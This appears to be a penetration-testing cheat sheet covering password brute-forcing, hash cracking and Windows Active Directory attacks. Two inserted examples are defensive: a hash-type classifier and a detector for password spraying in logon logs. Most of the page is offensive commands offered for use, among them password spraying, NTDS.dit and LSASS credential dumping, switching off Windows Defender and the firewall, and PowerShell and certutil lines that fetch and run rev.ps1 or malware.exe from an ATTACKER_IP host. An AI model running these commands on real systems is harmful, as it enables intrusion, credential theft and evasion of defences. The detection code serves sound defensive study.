Cracking password protected PDF files
$ pdfcrack -f <pdf file> -w <wordlist>

Cracking Web-Application Passwords
Get Request:
$ hydra -L <usernames list> -P <passwords list> <target ip> http-get <path to admin panel>
Post Request:
$ hydra -L <usernames list> -P <passwords list> <target ip> http-form-post "<Login Page>:<Request Body with ^USER^ and ^PASS^>:<Error Message>"
e.g: hydra -L <usernames list> -P <passwords list> <target ip> http-form-post "/dvwa/login.php:username=^USER^&password=^PASS^:<Error Message>"

Wordpress:
$ wpscan --url <target ip/wp-login> -U <usernames list> -P <passwords list>

Cracking SSH Passwords
$ hydra -L <username list> -P <passwords list> 10.10.10.180 ssh 
$ ncrack -U <usernames list> -P <passwords list> ssh://10.10.10.180 
Cracking FTP Passwords 
$ hydra -L <usernames list> -P <passwords list> 10.10.10.180 ftp 
$ ncrack -U <usernames list> -P <passwords list> ftp://10.10.10.180
Cracking Passwords when Service uses non-standard port
$ hydra -L <username list> -P <passwords list> -s <port> 10.10.10.180 ssh 
$ ncrack -U <usernames list> -P <passwords list> 10.10.10.180:<port> 


Identifying Hash Types: 
$ hashid <file containing hashes> 
$ hashid -m <file containing hashes> # Shows hashcat mode 
$ hashid -j <file containing hashes> # Shows john format 

Converting encrypted files into a format supported by John: 
$ unshadow <etc_passwd file> <etc_shadow_file> > unshadowed.file 
$ ssh2john.py <encrypted SSH key file> > SSHkey.john 
$ keepass2john <kdb file> > keepass_hash.john 
$ rar2john <encrypted rar file> > rarfilehash.john
$ 7z2john <encrypted 7z file> > 7zfilehash.john

Cracking Hashes Using John The Ripper: 
$ john --list=formats # outputs all supported format 
$ john <hash file> --wordlist=<path to wordlist> 
$ john <hash file> --show (shows cracked hashes) 
$ john <hash file> --wordlist=<path to wordlist> --format=<hash format> 
$ john <hash file> --incremental # uses ASCII incremental mode 
$ john <hash file> --incremental=digits # uses digit incremental
# mode : 0 to 99999999999999999999 



Cracking Hashes Using HashCat:
$ hashcat -m <hash type mode> -a <attack mode> <hash file> <path to wordlist> 

HashCat Attack Modes (-a):
0 : Straight 
1 : Combination 
3 : Brute-force 

HashCat Hash Types (-m): 
Linux OS Hashes:
500 : MD5 ($1$)
3200 : Blowfish ($2$)
7400 : SHA256 ($5$)
1800 : SHA512 ($6$)

Windows OS Hashes:
1000 : NTLM 
3000 : LM 

MacOS Hashes:
122 : MacOS v10.4,10.5,10.6 
1722 : MacOS v10.7 
7100 : MacOS v10.8+ 

Application hashes 
900 : MD4 
0 : MD5 
100 : SHA1
1400 : SHA2-256 
1700 : SHA2-512 
17400 : SHA3-256 
17600 : SHA3-512 

Network Protocol Hashes: 
7500 : Kerberos 5 
10200 : CRAM-MD5 
11100 : PostgreSQL CRAM (MD5)
11200 : MySQL CRAM (SHA1) 
16500 : JSON Web Token

Salted Hashes:
10 : MD5 ($pass.$salt)
20 : MD5 ($salt.$pass) 
110 : SHA1 ($pass.$salt)
1410 : SHA256 ($pass.$salt) 
1420 : SHA256 ($salt.$pass)
1710 : SHA512 ($pass.$salt) 
1720 : SHA512 ($salt.$pass) 
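An added example of mine, not part of the cheat sheet: the lookup the table above describes, written as code. Crypt-style hashes announce their algorithm in a `$id$` prefix, so they map to a single mode; a bare hex digest only tells you its length, so for those the function returns every candidate mode (a 32-hex string may be MD5, MD4 or NTLM) instead of guessing, which is the point a hashid/hashcat user most often trips over. The sample hashes are constructed or widely published test digests; `classify_hash` and `classify_shadow_line` are my names.

```python
import re

# Added example (not from the cheat sheet): map a hash string to the hashcat
# -m values listed above. Bare hex digests are ambiguous by length, so those
# return every candidate mode rather than a single guess.

CRYPT_PREFIXES = {
    "$1$": (500, "md5crypt"),
    "$2a$": (3200, "bcrypt"),
    "$2b$": (3200, "bcrypt"),
    "$2y$": (3200, "bcrypt"),
    "$5$": (7400, "sha256crypt"),
    "$6$": (1800, "sha512crypt"),
}

# Candidates for a raw hex digest, keyed by hex length.
HEX_CANDIDATES = {
    16: [(3000, "LM (one 8-byte half)")],
    32: [(0, "MD5"), (900, "MD4"), (1000, "NTLM")],
    40: [(100, "SHA1")],
    64: [(1400, "SHA2-256"), (17400, "SHA3-256")],
    128: [(1700, "SHA2-512"), (17600, "SHA3-512")],
}

JWT_RE = re.compile(r"^eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def classify_hash(value):
    """Return a list of (hashcat_mode, name) candidates; empty if nothing matched."""
    h = value.strip()
    for prefix, candidate in CRYPT_PREFIXES.items():
        if h.startswith(prefix):
            return [candidate]
    if JWT_RE.match(h):
        return [(16500, "JSON Web Token")]
    if HEX_RE.match(h) and len(h) in HEX_CANDIDATES:
        return list(HEX_CANDIDATES[len(h)])
    return []


def classify_shadow_line(line):
    """Classify the hash field of an /etc/shadow or unshadow-style line (user:hash:...)."""
    fields = line.split(":")
    if len(fields) < 2 or fields[1] in ("", "*", "!", "!!"):
        return fields[0], []  # locked account or no password set: nothing to crack
    return fields[0], classify_hash(fields[1])


# Constructed samples: placeholder crypt strings plus two widely published test digests.
SAMPLES = [
    "$6$saltsalt$PLACEHOLDERHASHPLACEHOLDERHASH",
    "$1$saltsalt$PLACEHOLDER",
    "$2b$10$PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDER",
    "5f4dcc3b5aa765d61d8327deb882cf99",          # MD5("password")
    "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",  # SHA1("password")
    "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ4In0.c2ln",
    "root:!:18000:0:99999:7:::",
]

if __name__ == "__main__":
    for s in SAMPLES:
        result = classify_shadow_line(s) if ":" in s else classify_hash(s)
        print(s[:40].ljust(42), result)
```

When the function returns several candidates, try them in order against a hash whose plaintext you already know (a test account) before committing GPU time to the whole file; running the wrong mode silently produces zero cracks rather than an error.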

Apr 15, 2020

Windows Penetration Testing Cheat Sheet


LDAP enumeration
$ enum4linux -a 10.10.10.180
$ smbclient -L \\10.10.10.180 -N
$ ldapsearch -x -H ldap://10.10.10.180 -b "dc=DOMAIN,dc=LOCAL"
$ python windapsearch.py -u username -p password -d DOMAIN.LOCAL --dc-ip 10.10.10.180
$ python ad-ldap-enum.py -d DOMAIN.LOCAL -l 10.10.10.180 -u username -p password

Find some useful credentials:
$ GetNPUsers.py -dc-ip 10.10.10.180 -no-pass "DOMAIN.LOCAL/username"
$ smbclient -U username -L \\10.10.10.180

Connect
$ evil-winrm -i 10.10.10.180 -u username -p password
$ psexec.py username:password@10.10.10.180
$ wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Username@10.10.10.180


Crack/Bruteforce
$ hashcat -m 18200 -a 0 -w 3 hashfile.hash rockyou.txt
Username brute:
$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.180 users.txt
Password brute
$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.180 rockyou.txt username123

Password spray
$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.180 users.txt rockyou.txt
https://github.com/dafthack/DomainPasswordSpray
> Import-Module .\DomainPasswordSpray.ps1
> Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
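An added example of mine, not part of the cheat sheet: the detection side of the spraying commands above. A spray shows up in the domain controller's security log as one source producing failed logons (event 4625, or 4771 Kerberos pre-authentication failures when Kerberos-based tooling is used) against many different accounts in a short time, which is the opposite shape from a single user mistyping their own password. The events below are constructed; `detect_spray` is my name.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Added example (not from the cheat sheet): flag the footprint a password
# spray leaves in authentication logs, namely one source failing logons
# against many distinct accounts inside a short window.

# Constructed events: (timestamp, event_id, target_user, source_ip)
# 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = [
    ("2020-04-15T10:00:01", 4625, "dgalanos", "10.10.14.9"),
    ("2020-04-15T10:00:02", 4625, "roleary", "10.10.14.9"),
    ("2020-04-15T10:00:02", 4625, "smorgan", "10.10.14.9"),
    ("2020-04-15T10:00:03", 4625, "mhope", "10.10.14.9"),
    ("2020-04-15T10:00:03", 4625, "svc-ata", "10.10.14.9"),
    ("2020-04-15T10:00:04", 4625, "svc-bexec", "10.10.14.9"),
    ("2020-04-15T10:00:05", 4624, "SABatchJobs", "10.10.14.9"),  # the one that worked
    # One user mistyping their own password a few times is not a spray.
    ("2020-04-15T10:01:00", 4625, "mhope", "10.10.10.50"),
    ("2020-04-15T10:01:30", 4625, "mhope", "10.10.10.50"),
    ("2020-04-15T10:02:00", 4625, "mhope", "10.10.10.50"),
    ("2020-04-15T10:02:10", 4624, "mhope", "10.10.10.50"),
    # Three accounts from one host spread over an hour: below the default threshold.
    ("2020-04-15T11:00:00", 4625, "dgalanos", "10.10.10.60"),
    ("2020-04-15T11:20:00", 4625, "roleary", "10.10.10.60"),
    ("2020-04-15T11:40:00", 4625, "smorgan", "10.10.10.60"),
]


def detect_spray(events, window_minutes=10, min_users=5):
    """Return {source_ip: {"users": [...], "succeeded": [...]}} for every source
    that failed logons against at least min_users distinct accounts inside any
    window_minutes span. "succeeded" lists accounts that source did log in as."""
    fails = defaultdict(list)
    successes = defaultdict(set)
    for ts, event_id, user, src in events:
        when = datetime.fromisoformat(ts)
        if event_id == 4625:
            fails[src].append((when, user.lower()))
        elif event_id == 4624:
            successes[src].add(user.lower())

    window = timedelta(minutes=window_minutes)
    alerts = {}
    for src, attempts in fails.items():
        attempts.sort()
        lo = 0
        for hi in range(len(attempts)):
            # Slide the window start forward until it spans at most window_minutes.
            while attempts[hi][0] - attempts[lo][0] > window:
                lo += 1
            users_in_window = {u for _, u in attempts[lo:hi + 1]}
            if len(users_in_window) >= min_users:
                alerts[src] = {
                    "users": sorted({u for _, u in attempts}),
                    "succeeded": sorted(successes[src]),
                }
                break
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: {len(info['users'])} accounts tried, "
              f"succeeded as {info['succeeded'] or 'none'}")
```

The "succeeded" field is what turns an alert into an incident: a spraying source that then authenticates as some account tells the responder exactly which credential to reset first. The window and user-count thresholds are deliberately parameters; tune them against a baseline of normal failed-logon volume before deploying the rule.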

Crack Tickets:
$ python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

CrackMapExec:
$ crackmapexec smb 10.10.10.180 -u '' -p ''
$ crackmapexec <protocol> 10.10.10.180


Changing Permissions of a File: 
> icacls file.txt /grant Everyone:F

Downloading files
> IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
> (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")  
> Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"  
> certutil.exe -urlcache -split -f "http://10.10.10.180:80/shell.exe" shell.exe



Privilege Escalation:
Autologon settings:
> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
Dump:
$ secretsdump.py -dc-ip 10.10.10.180 defaultUserName:defaultPassword\!@10.10.10.180
Dump SAM file:
$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

NTDS.dit dump:
$ secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
$ crackmapexec.py 10.10.10.180 -u username -p password -d DOMAIN.LOCAL --ntds drsuapi

On a DC, hashes can be dumped from lsass.exe:
> lsadump::lsa /inject


Recon:
> systeminfo
> hostname 

Especially useful for hotfix info
> wmic qfe get Caption,Description,HotFixID,InstalledOn

What users/local groups are on the machine?
> net users
> net localgroup
> net localgroup Administrators
> net user username

Crosscheck local and domain too
> net user username /domain
> net group Administrators /domain

Network information
> ipconfig /all
> route print
> arp -A

To see what privileges our token holds
> whoami /priv

What groups are we in?
> whoami /groups

Recursive string scan
> findstr /spin "password" *.*

Running processes
> tasklist /SVC

Network connections
> netstat -ano

Search for writeable directories
> dir /a-r-d /s /b

Show files/dirs, including hidden ones
> dir -force

Windows Defender
> sc.exe config WinDefend start= disabled
> sc.exe stop WinDefend
> Set-MpPreference -DisableRealtimeMonitoring $true

Firewall
> Netsh Advfirewall show allprofiles
> NetSh Advfirewall set allprofiles state off


Useful tools/modules
Nishang : https://github.com/samratashok/nishang
